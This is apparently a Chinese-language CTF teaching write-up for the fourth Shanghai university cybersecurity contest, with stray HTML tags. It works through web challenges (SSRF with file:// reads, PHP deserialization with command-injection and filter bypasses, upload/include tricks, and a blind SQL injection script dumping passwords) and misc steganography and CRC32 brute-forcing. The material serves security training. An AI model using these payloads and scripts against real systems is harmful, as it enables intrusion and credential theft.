第四届上海市大学生网络安全大赛Web+Misc题解教学文档<\/h1>

Web题目解析<\/h2>

Web1 - SSRF与文件读取<\/h3>

解题步骤：<\/strong><\/p>

查看robots.txt<\/code>发现flag.php<\/code>和source.php<\/code><\/li>
访问source.php<\/code>需要管理员权限<\/li>
绕过方法： POST数据：admin=1<\/code><\/li> 伪造IP：添加HTTP头x-client-ip:127.0.0.1<\/code><\/li> <\/ul> <\/li> 利用SSRF功能：初始POST：url=http:\/\/www.ichunqiu.com<\/code>获取图片数据<\/li> 发现是网站首页源码，确认SSRF漏洞<\/li> <\/ul> <\/li> 最终利用file:\/\/<\/code>协议读取本地文件： Payload: url=file:\/\/www.ichunqiu.com\/\/var\/www\/html\/flag.php<\/code><\/li> 下载JPG文件查看内容获取flag<\/li> <\/ul> <\/li> <\/ol> 关键点：<\/strong><\/p> robots.txt信息泄露<\/li> IP伪造绕过<\/li> SSRF漏洞利用<\/li> file:\/\/协议读取本地文件<\/li> <\/ul> Web2 - 反序列化漏洞<\/h3> 源码分析：<\/strong><\/p> class<\/span> come<\/span> { <\/span><\/span> private<\/span> $method; <\/span><\/span> private<\/span> $args; <\/span><\/span> <\/span><\/span> function<\/span> __wakeup() { <\/span><\/span> foreach<\/span>($this-><\/span>args<\/span> as<\/span> $k =><\/span> $v) { <\/span><\/span> $this-><\/span>args<\/span>[$k] =<\/span> $this-><\/span>waf<\/span>(trim<\/span>($v)); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> function<\/span> waf<\/span>($str) { <\/span><\/span> $str =<\/span> preg_replace<\/span>("\/[ ]\/"<\/span>, ""<\/span>, $str); <\/span><\/span> $str =<\/span> str_replace<\/span>('flag'<\/span>, ''<\/span>, $str); <\/span><\/span> return<\/span> $str; <\/span><\/span> } <\/span><\/span> <\/span><\/span> function<\/span> echo<\/span>($host) { <\/span><\/span> system<\/span>("echo <\/span>$host<\/span>"<\/span>); <\/span><\/span> } <\/span><\/span> <\/span><\/span> function<\/span> __destruct() { <\/span><\/span> if<\/span> (in_array<\/span>($this-><\/span>method<\/span>, array<\/span>("echo"<\/span>))) { <\/span><\/span> call_user_func_array<\/span>(array<\/span>($this, $this-><\/span>method<\/span>), $this-><\/span>args<\/span>); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>解题步骤：<\/strong><\/p> 构造GET参数使$first==="doller"<\/code>： ?first=doller&a=var=give&bbb=me&ccc=flag<\/code><\/li> <\/ul> <\/li> 构造反序列化payload执行命令：绕过空格过滤：使用$IFS<\/code><\/li> 绕过flag过滤：双写flaflagg<\/code><\/li> <\/ul> <\/li> 最终payload： O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A18%3A%22%60cat%24IFS%2Fflaflagg%60%22%3B%7D%7D <\/code><\/pre> <\/li> <\/ol> 关键点：<\/strong><\/p> 反序列化漏洞利用<\/li> WAF绕过技术<\/li> 私有属性序列化格式<\/li> 命令执行绕过<\/li> <\/ul> Web3 - 文件上传与包含<\/h3> 源码分析：<\/strong><\/p> $dir =<\/span> md5<\/span>("icq"<\/span>); <\/span><\/span>$sandbox =<\/span> '\/var\/sandbox\/'<\/span> .<\/span> $dir; <\/span><\/span>@<\/span>mkdir<\/span>($sandbox); <\/span><\/span>@<\/span>chdir<\/span>($sandbox); <\/span><\/span> <\/span><\/span>if<\/span>($_FILES['file'<\/span>]['name'<\/span>]) { <\/span><\/span> $filename =<\/span> !<\/span>empty<\/span>($_POST['file'<\/span>]) ?<\/span> $_POST['file'<\/span>] :<\/span> $_FILES['file'<\/span>]['name'<\/span>]; <\/span><\/span> if<\/span> (!<\/span>is_array<\/span>($filename)) { <\/span><\/span> $filename =<\/span> explode<\/span>('.'<\/span>, $filename); <\/span><\/span> } <\/span><\/span> $ext =<\/span> end<\/span>($filename); <\/span><\/span> if<\/span>($ext ==<\/span> $filename[count<\/span>($filename) -<\/span> 1<\/span>]) { <\/span><\/span> die<\/span>("emmmm"<\/span>); <\/span><\/span> } <\/span><\/span> $new_name =<\/span> (string<\/span>)rand<\/span>(100<\/span>,999<\/span>).<\/span>"."<\/span>.<\/span>$ext; <\/span><\/span> move_uploaded_file<\/span>($_FILES['file'<\/span>]['tmp_name'<\/span>], $new_name); <\/span><\/span> <\/span><\/span> if<\/span>(@<\/span>substr<\/span>(file<\/span>($_)[0<\/span>],0<\/span>,6<\/span>) ===<\/span> '@<?php'<\/span> &&<\/span> strpos<\/span>($_, $new_name) ===<\/span> false<\/span>) { <\/span><\/span> include<\/span>($_); <\/span><\/span> } <\/span><\/span> unlink<\/span>($new_name); <\/span><\/span>} <\/span><\/span><\/code><\/pre>解题步骤：<\/strong><\/p> 绕过文件扩展名检查：构造数组使end($filename) != $filename[count($filename)-1]<\/code><\/li> 例如：[1=>'123', 5=>'php']<\/code><\/li> <\/ul> <\/li> 上传文件并包含：上传文件内容以@<?php<\/code>开头<\/li> 使用123.php\/.<\/code>绕过unlink<\/li> <\/ul> <\/li> 爆破随机生成的文件名(100-999)<\/li> 访问包含的文件执行命令获取flag<\/li> <\/ol> 关键点：<\/strong><\/p> 数组构造绕过检查<\/li> 文件包含漏洞<\/li> unlink绕过技术<\/li> 随机文件名爆破<\/li> <\/ul> Web4 - SQL注入与文件上传<\/h3> 解题步骤：<\/strong><\/p> SQL注入部分：<\/strong><\/p> 发现注入点：1' and 1=1%23<\/code><\/li> 绕过information_schema<\/code>过滤：使用空格分隔：information_schema . tables<\/code><\/li> <\/ul> <\/li> 盲注脚本：<\/li> <\/ol> import<\/span> requests <\/span><\/span>import<\/span> string <\/span><\/span> <\/span><\/span>url =<\/span> 'http:\/\/target\/select_guest.php?id='<\/span> <\/span><\/span>flag =<\/span> ''<\/span> <\/span><\/span> <\/span><\/span>for<\/span> i in<\/span> range(1<\/span>,100<\/span>): <\/span><\/span> for<\/span> j in<\/span> range(33<\/span>,127<\/span>): <\/span><\/span> payload =<\/span> "1' and (ascii(substr((SELECT GROUP_CONCAT(password) FROM user),<\/span>%d<\/span>,1))=<\/span>%d<\/span>)<\/span>%%<\/span>23&Submit=Select+Guest"<\/span>%<\/span>(i,j) <\/span><\/span> url1 =<\/span> url +<\/span> payload <\/span><\/span> r =<\/span> requests.<\/span>get(url=<\/span>url1) <\/span><\/span> if<\/span> '10.10.1.1'<\/span> in<\/span> r.<\/span>content: <\/span><\/span> flag =<\/span> flag +<\/span> chr(j) <\/span><\/span> print flag <\/span><\/span> break<\/span> <\/span><\/span><\/code><\/pre> 获取管理员密码MD5并解密<\/li> <\/ol> 文件上传部分：<\/strong><\/p> 登录后尝试上传绕过：提示：please upload to .\/flag.php<\/code><\/li> <\/ul> <\/li> 构造路径：利用uploaddir<\/code>参数拼接<\/li> <\/ul> <\/li> 截断技巧：使用\x02<\/code>截断而非\x00<\/code><\/li> <\/ul> <\/li> 最终上传flag.php<\/code>获取flag<\/li> <\/ol> 关键点：<\/strong><\/p> SQL注入绕过过滤技术<\/li> 盲注脚本编写<\/li> 文件上传路径控制<\/li> 非常规截断方法<\/li> <\/ul> Misc题目解析<\/h2> 题目1 - 文件分析与隐写<\/h3> 解题步骤：<\/strong><\/p> 分析txt文件：第一行末有倒置PNG头<\/li> 最后一行有Word文件头<\/li> <\/ul> <\/li> 两种倒序处理：得到加密Word文档和PNG图片<\/li> <\/ul> <\/li> 扫描二维码得到:2?kEaX<\/code><\/li> Base92解密得到密码Passwd<\/code><\/li> 打开Word文档：移开二维码发现隐藏信息<\/li> 扫描二维码获取部分flag<\/li> "文档隐藏"上方发现部分flag<\/li> <\/ul> <\/li> 使用steganography工具：从"YOU ARE ALIVE"图片中提取flag片段<\/li> <\/ul> <\/li> 拼接完整flag<\/li> <\/ol> 关键点：<\/strong><\/p> 文件头分析<\/li> 倒序处理技巧<\/li> Base92编码<\/li> 多重隐写技术<\/li> <\/ul> 题目nofind - 流量分析与OpenPuff<\/h3> 解题步骤：<\/strong><\/p> 分析流量包：在TCP流中发现上传的压缩包<\/li> <\/ul> <\/li> 导出HTTP对象获取文件： example1(1).php<\/code><\/li> <\/ul> <\/li> 使用binwalk分离： binwalk -e<\/code>分离出图片<\/li> <\/ul> <\/li> 根据提示使用OpenPuff：需要三个密码，图片提示ct??????<\/code><\/li> <\/ul> <\/li> 分析HTTP对象中的三个CRC32值<\/li> 编写CRC32爆破脚本：<\/li> <\/ol> import<\/span> binascii <\/span><\/span>import<\/span> itertools <\/span><\/span> <\/span><\/span>def<\/span> crc32_brute<\/span>(length, target): <\/span><\/span> chars =<\/span> 'abcdefghijklmnopqrstuvwxyz0123456789'<\/span> <\/span><\/span> for<\/span> item in<\/span> itertools.<\/span>product(chars, repeat=<\/span>length): <\/span><\/span> s =<\/span> ''<\/span>.<\/span>join(item) <\/span><\/span> if<\/span> binascii.<\/span>crc32(s) &<\/span> 0xffffffff<\/span> ==<\/span> target: <\/span><\/span> print(s) <\/span><\/span> return<\/span> s <\/span><\/span> return<\/span> None<\/span> <\/span><\/span> <\/span><\/span># 对三个CRC32值分别爆破6字节<\/span> <\/span><\/span>crc32_brute(6<\/span>, 0x12345678<\/span>) # 替换为实际CRC32值<\/span> <\/span><\/span><\/code><\/pre> 根据提示包含字母'f'：得到三个密钥：ct93fjhl<\/code>, ctmbof3k<\/code>, ctv4gfx1<\/code><\/li> <\/ul> <\/li> 输入OpenPuff解密获取flag<\/li> <\/ol> 关键点：<\/strong><\/p> 流量分析技巧<\/li> CRC32爆破方法<\/li> OpenPuff使用<\/li> 多重密码保护机制<\/li> <\/ul> 总结<\/h2> 本比赛涵盖了多种网络安全技术：<\/p> Web方面：<\/strong><\/p> 信息收集与robots.txt利用<\/li> SSRF漏洞利用与绕过<\/li> 反序列化漏洞与WAF绕过<\/li> 文件上传漏洞与包含漏洞<\/li> SQL注入与盲注技术<\/li> <\/ol> Misc方面：<\/strong><\/p> 文件分析与隐写术<\/li> 流量分析与数据提取<\/li> CRC32爆破技术<\/li> OpenPuff隐写工具使用<\/li> <\/ol> 关键技巧：<\/strong><\/p> 各种协议和伪协议的利用(file:\/\/)<\/li> WAF绕过技术(双写、$IFS等)<\/li> 反序列化漏洞利用<\/li> 非常规截断方法<\/li> 多重隐写分析技术<\/li> CRC32爆破与密码破解<\/li> <\/ul> 这些技术在实际渗透测试和安全研究中都有广泛应用，掌握这些技能对于网络安全从业者至关重要。<\/p>